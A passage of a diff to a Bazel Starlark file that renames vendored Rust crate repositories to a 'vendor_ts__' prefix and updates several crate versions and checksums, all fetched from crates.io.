+1126,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__darling-0.20.10", + name = "vendor_ts__darling-0.20.10", sha256 = "6f63b86c8a8826a49b8c21f08a2d07338eec8d900540f8630dc76284be802989", type = "tar.gz", urls = ["https://static.crates.io/crates/darling/0.20.10/download"], @@ -1125,7 +1136,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__darling_core-0.20.10", + name = "vendor_ts__darling_core-0.20.10", sha256 = "95133861a8032aaea082871032f5815eb9e98cef03fa916ab4500513994df9e5", type = "tar.gz", urls = ["https://static.crates.io/crates/darling_core/0.20.10/download"], @@ -1135,7 +1146,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__darling_macro-0.20.10", + name = "vendor_ts__darling_macro-0.20.10", sha256 = "d336a2a514f6ccccaa3e09b02d41d35330c07ddf03a62165fcec10bb561c7806", type = "tar.gz", urls = ["https://static.crates.io/crates/darling_macro/0.20.10/download"], @@ -1145,7 +1156,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__dashmap-5.5.3", + name = "vendor_ts__dashmap-5.5.3", sha256 = "978747c1d849a7d2ee5e8adc0159961c48fb7e5db2f06af6723b80123bb53856", type = "tar.gz", urls = ["https://static.crates.io/crates/dashmap/5.5.3/download"], @@ -1155,7 +1166,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__deranged-0.3.11", + name = "vendor_ts__deranged-0.3.11", sha256 = "b42b6fa04a440b495c8b04d0e71b707c585f83cb9cb28cf8cd0d976c315e31b4", type = "tar.gz", urls = ["https://static.crates.io/crates/deranged/0.3.11/download"], @@ -1165,7 +1176,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__drop_bomb-0.1.5", + name = "vendor_ts__drop_bomb-0.1.5", sha256 = "9bda8e21c04aca2ae33ffc2fd8c23134f3cac46db123ba97bd9d3f3b8a4a85e1", type = "tar.gz", urls = ["https://static.crates.io/crates/drop_bomb/0.1.5/download"], @@ -1175,7 +1186,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__dunce-1.0.5", + name = "vendor_ts__dunce-1.0.5", sha256 = "92773504d58c093f6de2459af4af33faa518c13451eb8f2b5698ed3d36e7c813", type = "tar.gz", urls = ["https://static.crates.io/crates/dunce/1.0.5/download"], @@ -1185,17 +1196,17 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__either-1.13.0", - sha256 = "60b1af1c220855b6ceac025d3f6ecdd2b7c4894bfe9cd9bda4fbb4bc7c0d4cf0", + name = "vendor_ts__either-1.14.0", + sha256 = "b7914353092ddf589ad78f25c5c1c21b7f80b0ff8621e7c814c3485b5306da9d", type = "tar.gz", - urls = ["https://static.crates.io/crates/either/1.13.0/download"], - strip_prefix = "either-1.13.0", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.either-1.13.0.bazel"), + urls = ["https://static.crates.io/crates/either/1.14.0/download"], + strip_prefix = "either-1.14.0", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.either-1.14.0.bazel"), ) maybe( http_archive, - name = "vendor__ena-0.14.3", + name = "vendor_ts__ena-0.14.3", sha256 = "3d248bdd43ce613d87415282f69b9bb99d947d290b10962dd6c56233312c2ad5", type = "tar.gz", urls = ["https://static.crates.io/crates/ena/0.14.3/download"], @@ -1205,7 +1216,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__encoding-0.2.33", + name = "vendor_ts__encoding-0.2.33", sha256 = "6b0d943856b990d12d3b55b359144ff341533e516d94098b1d3fc1ac666d36ec", type = "tar.gz", urls = ["https://static.crates.io/crates/encoding/0.2.33/download"], @@ -1215,7 +1226,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__encoding-index-japanese-1.20141219.5", + name = "vendor_ts__encoding-index-japanese-1.20141219.5", sha256 = "04e8b2ff42e9a05335dbf8b5c6f7567e5591d0d916ccef4e0b1710d32a0d0c91", type = "tar.gz", urls = ["https://static.crates.io/crates/encoding-index-japanese/1.20141219.5/download"], @@ -1225,7 +1236,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__encoding-index-korean-1.20141219.5", + name = "vendor_ts__encoding-index-korean-1.20141219.5", sha256 = "4dc33fb8e6bcba213fe2f14275f0963fd16f0a02c878e3095ecfdf5bee529d81", type = "tar.gz", urls = ["https://static.crates.io/crates/encoding-index-korean/1.20141219.5/download"], @@ -1235,7 +1246,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__encoding-index-simpchinese-1.20141219.5", + name = "vendor_ts__encoding-index-simpchinese-1.20141219.5", sha256 = "d87a7194909b9118fc707194baa434a4e3b0fb6a5a757c73c3adb07aa25031f7", type = "tar.gz", urls = ["https://static.crates.io/crates/encoding-index-simpchinese/1.20141219.5/download"], @@ -1245,7 +1256,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__encoding-index-singlebyte-1.20141219.5", + name = "vendor_ts__encoding-index-singlebyte-1.20141219.5", sha256 = "3351d5acffb224af9ca265f435b859c7c01537c0849754d3db3fdf2bfe2ae84a", type = "tar.gz", urls = ["https://static.crates.io/crates/encoding-index-singlebyte/1.20141219.5/download"], @@ -1255,7 +1266,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__encoding-index-tradchinese-1.20141219.5", + name = "vendor_ts__encoding-index-tradchinese-1.20141219.5", sha256 = "fd0e20d5688ce3cab59eb3ef3a2083a5c77bf496cb798dc6fcdb75f323890c18", type = "tar.gz", urls = ["https://static.crates.io/crates/encoding-index-tradchinese/1.20141219.5/download"], @@ -1265,7 +1276,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__encoding_index_tests-0.1.4", + name = "vendor_ts__encoding_index_tests-0.1.4", sha256 = "a246d82be1c9d791c5dfde9a2bd045fc3cbba3fa2b11ad558f27d01712f00569", type = "tar.gz", urls = ["https://static.crates.io/crates/encoding_index_tests/0.1.4/download"], @@ -1275,7 +1286,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__equivalent-1.0.1", + name = "vendor_ts__equivalent-1.0.1", sha256 = "5443807d6dff69373d433ab9ef5378ad8df50ca6298caf15de6e52e24aaf54d5", type = "tar.gz", urls = ["https://static.crates.io/crates/equivalent/1.0.1/download"], @@ -1285,7 +1296,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__figment-0.10.19", + name = "vendor_ts__figment-0.10.19", sha256 = "8cb01cd46b0cf372153850f4c6c272d9cbea2da513e07538405148f95bd789f3", type = "tar.gz", urls = ["https://static.crates.io/crates/figment/0.10.19/download"], @@ -1295,7 +1306,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__filetime-0.2.25", + name = "vendor_ts__filetime-0.2.25", sha256 = "35c0522e981e68cbfa8c3f978441a5f34b30b96e146b33cd3359176b50fe8586", type = "tar.gz", urls = ["https://static.crates.io/crates/filetime/0.2.25/download"], @@ -1305,7 +1316,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__fixedbitset-0.4.2", + name = "vendor_ts__fixedbitset-0.4.2", sha256 = "0ce7134b9999ecaf8bcd65542e436736ef32ddca1b3e06094cb6ec5755203b80", type = "tar.gz", urls = ["https://static.crates.io/crates/fixedbitset/0.4.2/download"], @@ -1315,17 +1326,17 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__flate2-1.0.35", - sha256 = "c936bfdafb507ebbf50b8074c54fa31c5be9a1e7e5f467dd659697041407d07c", + name = "vendor_ts__flate2-1.1.0", + sha256 = "11faaf5a5236997af9848be0bef4db95824b1d534ebc64d0f0c6cf3e67bd38dc", type = "tar.gz", - urls = ["https://static.crates.io/crates/flate2/1.0.35/download"], - strip_prefix = "flate2-1.0.35", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.flate2-1.0.35.bazel"), + urls = ["https://static.crates.io/crates/flate2/1.1.0/download"], + strip_prefix = "flate2-1.1.0", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.flate2-1.1.0.bazel"), ) maybe( http_archive, - name = "vendor__fnv-1.0.7", + name = "vendor_ts__fnv-1.0.7", sha256 = "3f9eec918d3f24069decb9af1554cad7c880e2da24a9afd88aca000531ab82c1", type = "tar.gz", urls = ["https://static.crates.io/crates/fnv/1.0.7/download"], @@ -1335,7 +1346,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__fs-err-2.11.0", + name = "vendor_ts__fs-err-2.11.0", sha256 = "88a41f105fe1d5b6b34b2055e3dc59bb79b46b48b2040b9e6c7b4b5de097aa41", type = "tar.gz", urls = ["https://static.crates.io/crates/fs-err/2.11.0/download"], @@ -1345,7 +1356,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__fsevent-sys-4.1.0", + name = "vendor_ts__fsevent-sys-4.1.0", sha256 = "76ee7a02da4d231650c7cea31349b889be2f45ddb3ef3032d2ec8185f6313fd2", type = "tar.gz", urls = ["https://static.crates.io/crates/fsevent-sys/4.1.0/download"], @@ -1355,7 +1366,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__fst-0.4.7", + name = "vendor_ts__fst-0.4.7", sha256 = "7ab85b9b05e3978cc9a9cf8fea7f01b494e1a09ed3037e16ba39edc7a29eb61a", type = "tar.gz", urls = ["https://static.crates.io/crates/fst/0.4.7/download"], @@ -1365,17 +1376,17 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__getrandom-0.2.15", - sha256 = "c4567c8db10ae91089c99af84c68c38da3ec2f087c3f82960bcdbf3656b6f4d7", + name = "vendor_ts__getrandom-0.3.1", + sha256 = "43a49c392881ce6d5c3b8cb70f98717b7c07aabbdff06687b9030dbfbe2725f8", type = "tar.gz", - urls = ["https://static.crates.io/crates/getrandom/0.2.15/download"], - strip_prefix = "getrandom-0.2.15", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.getrandom-0.2.15.bazel"), + urls = ["https://static.crates.io/crates/getrandom/0.3.1/download"], + strip_prefix = "getrandom-0.3.1", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.getrandom-0.3.1.bazel"), ) maybe( http_archive, - name = "vendor__glob-0.3.2", + name = "vendor_ts__glob-0.3.2", sha256 = "a8d1add55171497b4705a648c6b583acafb01d58050a51727785f0b2c8e0a2b2", type = "tar.gz", urls = ["https://static.crates.io/crates/glob/0.3.2/download"], @@ -1385,7 +1396,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__globset-0.4.15", + name = "vendor_ts__globset-0.4.15", sha256 = "15f1ce686646e7f1e19bf7d5533fe443a45dbfb990e00629110797578b42fb19", type = "tar.gz", urls = ["https://static.crates.io/crates/globset/0.4.15/download"], @@ -1395,7 +1406,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__hashbrown-0.12.3", + name = "vendor_ts__hashbrown-0.12.3", sha256 = "8a9ee70c43aaf417c914396645a0fa852624801b24ebb7ae78fe8272889ac888", type = "tar.gz", urls = ["https://static.crates.io/crates/hashbrown/0.12.3/download"], @@ -1405,7 +1416,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__hashbrown-0.14.5", + name = "vendor_ts__hashbrown-0.14.5", sha256 = "e5274423e17b7c9fc20b6e7e208532f9b19825d82dfd615708b70edd83df41f1", type = "tar.gz", urls = ["https://static.crates.io/crates/hashbrown/0.14.5/download"], @@ -1415,7 +1426,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__hashbrown-0.15.2", + name = "vendor_ts__hashbrown-0.15.2", sha256 = "bf151400ff0baff5465007dd2f3e717f3fe502074ca563069ce3a6629d07b289", type = "tar.gz", urls = ["https://static.crates.io/crates/hashbrown/0.15.2/download"], @@ -1425,7 +1436,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__heck-0.4.1", + name = "vendor_ts__heck-0.4.1", sha256 = "95505c38b4572b2d910cecb0281560f54b440a19336cbbcb27bf6ce6adc6f5a8", type = "tar.gz", urls = ["https://static.crates.io/crates/heck/0.4.1/download"], @@ -1435,7 +1446,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__heck-0.5.0", + name = "vendor_ts__heck-0.5.0", sha256 = "2304e00983f87ffb38b55b444b5e3b60a884b5d30c0fca7d82fe33449bbe55ea", type = "tar.gz", urls = ["https://static.crates.io/crates/heck/0.5.0/download"], @@ -1445,7 +1456,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__hermit-abi-0.3.9", + name = "vendor_ts__hermit-abi-0.3.9", sha256 = "d231dfb89cfffdbc30e7fc41579ed6066ad03abda9e567ccafae602b97ec5024", type = "tar.gz", urls = ["https://static.crates.io/crates/hermit-abi/0.3.9/download"], @@ -1455,7 +1466,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__hex-0.4.3", + name = "vendor_ts__hex-0.4.3", sha256 = "7f24254aa9a54b5c858eaee2f5bccdb46aaf0e486a595ed5fd8f86ba55232a70", type = "tar.gz", urls = ["https://static.crates.io/crates/hex/0.4.3/download"], @@ -1465,7 +1476,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__home-0.5.11", + name = "vendor_ts__home-0.5.11", sha256 = "589533453244b0995c858700322199b2becb13b627df2851f64a2775d024abcf", type = "tar.gz", urls = ["https://static.crates.io/crates/home/0.5.11/download"], @@ -1475,7 +1486,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__iana-time-zone-0.1.61", + name = "vendor_ts__iana-time-zone-0.1.61", sha256 = "235e081f3925a06703c2d0117ea8b91f042756fd6e7a6e5d901e8ca1a996b220", type = "tar.gz", urls = ["https://static.crates.io/crates/iana-time-zone/0.1.61/download"], @@ -1485,7 +1496,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__iana-time-zone-haiku-0.1.2", + name = "vendor_ts__iana-time-zone-haiku-0.1.2", sha256 = "f31827a206f56af32e590ba56d5d2d085f558508192593743f16b2306495269f", type = "tar.gz", urls = ["https://static.crates.io/crates/iana-time-zone-haiku/0.1.2/download"], @@ -1495,7 +1506,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__ident_case-1.0.1", + name = "vendor_ts__ident_case-1.0.1", sha256 = "b9e0384b61958566e926dc50660321d12159025e767c18e043daf26b70104c39", type = "tar.gz", urls = ["https://static.crates.io/crates/ident_case/1.0.1/download"], @@ -1505,7 +1516,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__indexmap-1.9.3", + name = "vendor_ts__indexmap-1.9.3", sha256 = "bd070e393353796e801d209ad339e89596eb4c8d430d18ede6a1cced8fafbd99", type = "tar.gz", urls = ["https://static.crates.io/crates/indexmap/1.9.3/download"], @@ -1515,7 +1526,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__indexmap-2.7.0", + name = "vendor_ts__indexmap-2.7.0", sha256 = "62f822373a4fe84d4bb149bf54e584a7f4abec90e072ed49cda0edea5b95471f", type = "tar.gz", urls = ["https://static.crates.io/crates/indexmap/2.7.0/download"], @@ -1525,7 +1536,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__inlinable_string-0.1.15", + name = "vendor_ts__inlinable_string-0.1.15", sha256 = "c8fae54786f62fb2918dcfae3d568594e50eb9b5c25bf04371af6fe7516452fb", type = "tar.gz", urls = ["https://static.crates.io/crates/inlinable_string/0.1.15/download"], @@ -1535,17 +1546,17 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__inotify-0.9.6", - sha256 = "f8069d3ec154eb856955c1c0fbffefbf5f3c40a104ec912d4797314c1801abff", + name = "vendor_ts__inotify-0.11.0", + sha256 = "f37dccff2791ab604f9babef0ba14fbe0be30bd368dc541e2b08d07c8aa908f3", type = "tar.gz", - urls = ["https://static.crates.io/crates/inotify/0.9.6/download"], - strip_prefix = "inotify-0.9.6", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.inotify-0.9.6.bazel"), + urls = ["https://static.crates.io/crates/inotify/0.11.0/download"], + strip_prefix = "inotify-0.11.0", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.inotify-0.11.0.bazel"), ) maybe( http_archive, - name = "vendor__inotify-sys-0.1.5", + name = "vendor_ts__inotify-sys-0.1.5", sha256 = "e05c02b5e89bff3b946cedeca278abc628fe811e604f027c45a8aa3cf793d0eb", type = "tar.gz", urls = ["https://static.crates.io/crates/inotify-sys/0.1.5/download"], @@ -1555,7 +1566,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__is_terminal_polyfill-1.70.1", + name = "vendor_ts__is_terminal_polyfill-1.70.1", sha256 = "7943c866cc5cd64cbc25b2e01621d07fa8eb2a1a23160ee81ce38704e97b8ecf", type = "tar.gz", urls = ["https://static.crates.io/crates/is_terminal_polyfill/1.70.1/download"], @@ -1565,7 +1576,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__itertools-0.12.1", + name = "vendor_ts__itertools-0.12.1", sha256 = "ba291022dbbd398a455acf126c1e341954079855bc60dfdda641363bd6922569", type = "tar.gz", urls = ["https://static.crates.io/crates/itertools/0.12.1/download"], @@ -1575,7 +1586,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__itertools-0.14.0", + name = "vendor_ts__itertools-0.14.0", sha256 = "2b192c782037fadd9cfa75548310488aabdbf3d2da73885b31bd0abd03351285", type = "tar.gz", urls = ["https://static.crates.io/crates/itertools/0.14.0/download"], @@ -1585,7 +1596,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__itoa-1.0.14", + name = "vendor_ts__itoa-1.0.14", sha256 = "d75a2a4b1b190afb6f5425f10f6a8f959d2ea0b9c2b1d79553551850539e4674", type = "tar.gz", urls = ["https://static.crates.io/crates/itoa/1.0.14/download"], @@ -1595,7 +1606,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__jod-thread-0.1.2", + name = "vendor_ts__jod-thread-0.1.2", sha256 = "8b23360e99b8717f20aaa4598f5a6541efbe30630039fbc7706cf954a87947ae", type = "tar.gz", urls = ["https://static.crates.io/crates/jod-thread/0.1.2/download"], @@ -1605,7 +1616,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__js-sys-0.3.76", + name = "vendor_ts__js-sys-0.3.76", sha256 = "6717b6b5b077764fb5966237269cb3c64edddde4b14ce42647430a78ced9e7b7", type = "tar.gz", urls = ["https://static.crates.io/crates/js-sys/0.3.76/download"], @@ -1615,7 +1626,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__kqueue-1.0.8", + name = "vendor_ts__kqueue-1.0.8", sha256 = "7447f1ca1b7b563588a205fe93dea8df60fd981423a768bc1c0ded35ed147d0c", type = "tar.gz", urls = ["https://static.crates.io/crates/kqueue/1.0.8/download"], @@ -1625,7 +1636,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__kqueue-sys-1.0.4", + name = "vendor_ts__kqueue-sys-1.0.4", sha256 = "ed9625ffda8729b85e45cf04090035ac368927b8cebc34898e7c120f52e4838b", type = "tar.gz", urls = ["https://static.crates.io/crates/kqueue-sys/1.0.4/download"], @@ -1635,7 +1646,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__la-arena-0.3.1", + name = "vendor_ts__la-arena-0.3.1", sha256 = "3752f229dcc5a481d60f385fa479ff46818033d881d2d801aa27dffcfb5e8306", type = "tar.gz", urls = ["https://static.crates.io/crates/la-arena/0.3.1/download"], @@ -1645,7 +1656,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__lazy_static-1.5.0", + name = "vendor_ts__lazy_static-1.5.0", sha256 = "bbd2bcb4c963f2ddae06a2efc7e9f3591312473c50c6685e1f298068316e66fe", type = "tar.gz", urls = ["https://static.crates.io/crates/lazy_static/1.5.0/download"], @@ -1655,7 +1666,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__libc-0.2.169", + name = "vendor_ts__libc-0.2.169", sha256 = "b5aba8db14291edd000dfcc4d620c7ebfb122c613afb886ca8803fa4e128a20a", type = "tar.gz", urls = ["https://static.crates.io/crates/libc/0.2.169/download"], @@ -1665,7 +1676,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__libredox-0.1.3", + name = "vendor_ts__libredox-0.1.3", sha256 = "c0ff37bd590ca25063e35af745c343cb7a0271906fb7b37e4813e8f79f00268d", type = "tar.gz", urls = ["https://static.crates.io/crates/libredox/0.1.3/download"], @@ -1675,7 +1686,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__line-index-0.1.2", + name = "vendor_ts__line-index-0.1.2", sha256 = "3e27e0ed5a392a7f5ba0b3808a2afccff16c64933312c84b57618b49d1209bd2", type = "tar.gz", urls = ["https://static.crates.io/crates/line-index/0.1.2/download"], @@ -1685,7 +1696,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__lock_api-0.4.12", + name = "vendor_ts__lock_api-0.4.12", sha256 = "07af8b9cdd281b7915f413fa73f29ebd5d55d0d3f0155584dade1ff18cea1b17", type = "tar.gz", urls = ["https://static.crates.io/crates/lock_api/0.4.12/download"], @@ -1695,7 +1706,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__log-0.3.9", + name = "vendor_ts__log-0.3.9", sha256 = "e19e8d5c34a3e0e2223db8e060f9e8264aeeb5c5fc64a4ee9965c062211c024b", type = "tar.gz", urls = ["https://static.crates.io/crates/log/0.3.9/download"], @@ -1705,17 +1716,17 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__log-0.4.22", - sha256 = "a7a70ba024b9dc04c27ea2f0c0548feb474ec5c54bba33a7f72f873a39d07b24", + name = "vendor_ts__log-0.4.25", + sha256 = "04cbf5b083de1c7e0222a7a51dbfdba1cbe1c6ab0b15e29fff3f6c077fd9cd9f", type = "tar.gz", - urls = ["https://static.crates.io/crates/log/0.4.22/download"], - strip_prefix = "log-0.4.22", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.log-0.4.22.bazel"), + urls = ["https://static.crates.io/crates/log/0.4.25/download"], + strip_prefix = "log-0.4.25", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.log-0.4.25.bazel"), ) maybe( http_archive, - name = "vendor__lz4_flex-0.11.3", + name = "vendor_ts__lz4_flex-0.11.3", sha256 = "75761162ae2b0e580d7e7c390558127e5f01b4194debd6221fd8c207fc80e3f5", type = "tar.gz", urls = ["https://static.crates.io/crates/lz4_flex/0.11.3/download"], @@ -1725,7 +1736,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__matchers-0.1.0", + name = "vendor_ts__matchers-0.1.0", sha256 = "8263075bb86c5a1b1427b5ae862e8889656f126e9f77c484496e8b47cf5c5558", type = "tar.gz", urls = ["https://static.crates.io/crates/matchers/0.1.0/download"], @@ -1735,7 +1746,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__memchr-2.7.4", + name = "vendor_ts__memchr-2.7.4", sha256 = "78ca9ab1a0babb1e7d5695e3530886289c18cf2f87ec19a575a0abdce112e3a3", type = "tar.gz", urls = ["https://static.crates.io/crates/memchr/2.7.4/download"], @@ -1745,7 +1756,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__memoffset-0.9.1", + name = "vendor_ts__memoffset-0.9.1", sha256 = "488016bfae457b036d996092f6cb448677611ce4449e970ceaf42695203f218a", type = "tar.gz", urls = ["https://static.crates.io/crates/memoffset/0.9.1/download"], @@ -1755,27 +1766,27 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__miniz_oxide-0.8.2", - sha256 = "4ffbe83022cedc1d264172192511ae958937694cd57ce297164951b8b3568394", + name = "vendor_ts__miniz_oxide-0.8.5", + sha256 = "8e3e04debbb59698c15bacbb6d93584a8c0ca9cc3213cb423d31f760d8843ce5", type = "tar.gz", - urls = ["https://static.crates.io/crates/miniz_oxide/0.8.2/download"], - strip_prefix = "miniz_oxide-0.8.2", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.miniz_oxide-0.8.2.bazel"), + urls = ["https://static.crates.io/crates/miniz_oxide/0.8.5/download"], + strip_prefix = "miniz_oxide-0.8.5", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.miniz_oxide-0.8.5.bazel"), ) maybe( http_archive, - name = "vendor__mio-0.8.11", - sha256 = "a4a650543ca06a924e8b371db273b2756685faae30f8487da1b56505a8f78b0c", + name = "vendor_ts__mio-1.0.3", + sha256 = "2886843bf800fba2e3377cff24abf6379b4c4d5c6681eaf9ea5b0d15090450bd", type = "tar.gz", - urls = ["https://static.crates.io/crates/mio/0.8.11/download"], - strip_prefix = "mio-0.8.11", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.mio-0.8.11.bazel"), + urls = ["https://static.crates.io/crates/mio/1.0.3/download"], + strip_prefix = "mio-1.0.3", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.mio-1.0.3.bazel"), ) maybe( http_archive, - name = "vendor__miow-0.6.0", + name = "vendor_ts__miow-0.6.0", sha256 = "359f76430b20a79f9e20e115b3428614e654f04fab314482fc0fda0ebd3c6044", type = "tar.gz", urls = ["https://static.crates.io/crates/miow/0.6.0/download"], @@ -1785,7 +1796,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__mustache-0.9.0", + name = "vendor_ts__mustache-0.9.0", sha256 = "51956ef1c5d20a1384524d91e616fb44dfc7d8f249bf696d49c97dd3289ecab5", type = "tar.gz", urls = ["https://static.crates.io/crates/mustache/0.9.0/download"], @@ -1795,7 +1806,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__nohash-hasher-0.2.0", + name = "vendor_ts__nohash-hasher-0.2.0", sha256 = "2bf50223579dc7cdcfb3bfcacf7069ff68243f8c363f62ffa99cf000a6b9c451", type = "tar.gz", urls = ["https://static.crates.io/crates/nohash-hasher/0.2.0/download"], @@ -1805,17 +1816,27 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__notify-6.1.1", - sha256 = "6205bd8bb1e454ad2e27422015fb5e4f2bcc7e08fa8f27058670d208324a4d2d", + name = "vendor_ts__notify-8.0.0", + sha256 = "2fee8403b3d66ac7b26aee6e40a897d85dc5ce26f44da36b8b73e987cc52e943", type = "tar.gz", - urls = ["https://static.crates.io/crates/notify/6.1.1/download"], - strip_prefix = "notify-6.1.1", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.notify-6.1.1.bazel"), + urls = ["https://static.crates.io/crates/notify/8.0.0/download"], + strip_prefix = "notify-8.0.0", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.notify-8.0.0.bazel"), ) maybe( http_archive, - name = "vendor__nu-ansi-term-0.46.0", + name = "vendor_ts__notify-types-2.0.0", + sha256 = "5e0826a989adedc2a244799e823aece04662b66609d96af8dff7ac6df9a8925d", + type = "tar.gz", + urls = ["https://static.crates.io/crates/notify-types/2.0.0/download"], + strip_prefix = "notify-types-2.0.0", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.notify-types-2.0.0.bazel"), + ) + + maybe( + http_archive, + name = "vendor_ts__nu-ansi-term-0.46.0", sha256 = "77a8165726e8236064dbb45459242600304b42a5ea24ee2948e18e023bf7ba84", type = "tar.gz", urls = ["https://static.crates.io/crates/nu-ansi-term/0.46.0/download"], @@ -1825,7 +1846,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__num-conv-0.1.0", + name = "vendor_ts__num-conv-0.1.0", sha256 = "51d515d32fb182ee37cda2ccdcb92950d6a3c2893aa280e540671c2cd0f3b1d9", type = "tar.gz", urls = ["https://static.crates.io/crates/num-conv/0.1.0/download"], @@ -1835,7 +1856,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__num-traits-0.2.19", + name = "vendor_ts__num-traits-0.2.19", sha256 = "071dfc062690e90b734c0b2273ce72ad0ffa95f0c74596bc250dcfd960262841", type = "tar.gz", urls = ["https://static.crates.io/crates/num-traits/0.2.19/download"], @@ -1845,7 +1866,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__num_cpus-1.16.0", + name = "vendor_ts__num_cpus-1.16.0", sha256 = "4161fcb6d602d4d2081af7c3a45852d875a03dd337a6bfdd6e06407b61342a43", type = "tar.gz", urls = ["https://static.crates.io/crates/num_cpus/1.16.0/download"], @@ -1855,17 +1876,17 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__once_cell-1.20.2", - sha256 = "1261fe7e33c73b354eab43b1273a57c8f967d0391e80353e51f764ac02cf6775", + name = "vendor_ts__once_cell-1.20.3", + sha256 = "945462a4b81e43c4e3ba96bd7b49d834c6f61198356aa858733bc4acf3cbe62e", type = "tar.gz", - urls = ["https://static.crates.io/crates/once_cell/1.20.2/download"], - strip_prefix = "once_cell-1.20.2", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.once_cell-1.20.2.bazel"), + urls = ["https://static.crates.io/crates/once_cell/1.20.3/download"], + strip_prefix = "once_cell-1.20.3", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.once_cell-1.20.3.bazel"), ) maybe( http_archive, - name = "vendor__oorandom-11.1.4", + name = "vendor_ts__oorandom-11.1.4", sha256 = "b410bbe7e14ab526a0e86877eb47c6996a2bd7746f027ba551028c925390e4e9", type = "tar.gz", urls = ["https://static.crates.io/crates/oorandom/11.1.4/download"], @@ -1875,7 +1896,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__os_str_bytes-7.0.0", + name = "vendor_ts__os_str_bytes-7.0.0", sha256 = "7ac44c994af577c799b1b4bd80dc214701e349873ad894d6cdf96f4f7526e0b9", type = "tar.gz", urls = ["https://static.crates.io/crates/os_str_bytes/7.0.0/download"], @@ -1885,7 +1906,7 @@ def crate_repositories(): 